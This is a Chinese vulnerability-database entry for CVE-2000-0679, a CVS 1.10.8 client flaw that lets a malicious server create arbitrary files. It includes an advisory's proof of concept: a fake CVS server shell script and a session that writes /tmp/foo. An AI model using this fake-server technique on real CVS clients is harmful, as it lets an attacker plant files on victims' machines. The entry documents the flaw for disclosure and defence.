CVS客户端创建任意文件漏洞

CVS客户端创建任意文件漏洞

漏洞ID 1105941 漏洞类型 未知
发布时间 2000-07-28 更新时间 2005-05-02
图片[1]-CVS客户端创建任意文件漏洞-安全小百科CVE编号 CVE-2000-0679
图片[2]-CVS客户端创建任意文件漏洞-安全小百科CNNVD-ID CNNVD-200010-077
漏洞平台 Unix CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-077
|漏洞详情
CVS1.10.8版本客户端信任CVS服务器提供的路径名。服务器强制客户端创建任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/1523/info

The cvs client blindly trust paths returned to it by the server. Therefore, a cvs client could be tricked into creating a file anywhere on the system by a malicious server. 

This problem can be tested yourself as follows. Although this example
runs a faked cvs server using the :ext: method, this vulnerability is
available with any method (including :pserver: of course).

% ls -l /tmp/foo
ls: /tmp/foo: No such file or directory
% cat crackers-cvs-server
#!/bin/sh

cat <<'End'
Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot Static-directory Sticky Checkin-prog Update-prog
Entry Kopt Checkin-time Modified Is-modified UseUnchanged Unchanged Notify Questionable Case Argument Argumentx Global_option
Gzip-stream wrapper-sendme-rcsOptions Set Kerberos-encrypt expand-modules ci co update diff log add remove update-patches
gzip-file-contents status rdiff tag rtag import admin export history release watch-on watch-off watch-add watch-remove watchers
editors init annotate noop
ok
Module-expansion tst
ok
Clear-sticky tst/
/cvsroot/tst/
Clear-static-directory tst/
/cvsroot/tst/
E cvs server: Updating tst
Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc
ok
End
% CVS_RSH=./crackers-cvs-server cvs -f -d :ext:user@server:/cvsroot co tst
cvs server: Updating tst
cvs checkout: in directory /tmp:
cvs checkout: cannot open CVS/Entries for reading: No such file or directory
cvs checkout: cannot open CVS/Entries.Log: No such file or directory
% ls -l /tmp/foo
-rw-r--r-- 1 akr wheel 4 Jul 19 22:01 /tmp/foo
% cat /tmp/foo
abc
|参考资料

来源:BUGTRAQ
名称:20000728cvssecurityproblem
链接:http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26msg%3Dhvou2daoebb.fsf%40serein.m17n.org
来源:BID
名称:1523
链接:http://www.securityfocus.com/bid/1523

相关推荐: W3C Amaya Templates Server Directory Traversal Vulnerability

W3C Amaya Templates Server Directory Traversal Vulnerability 漏洞ID 1103433 漏洞类型 Input Validation Error 发布时间 2001-02-13 更新时间 2001-02…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享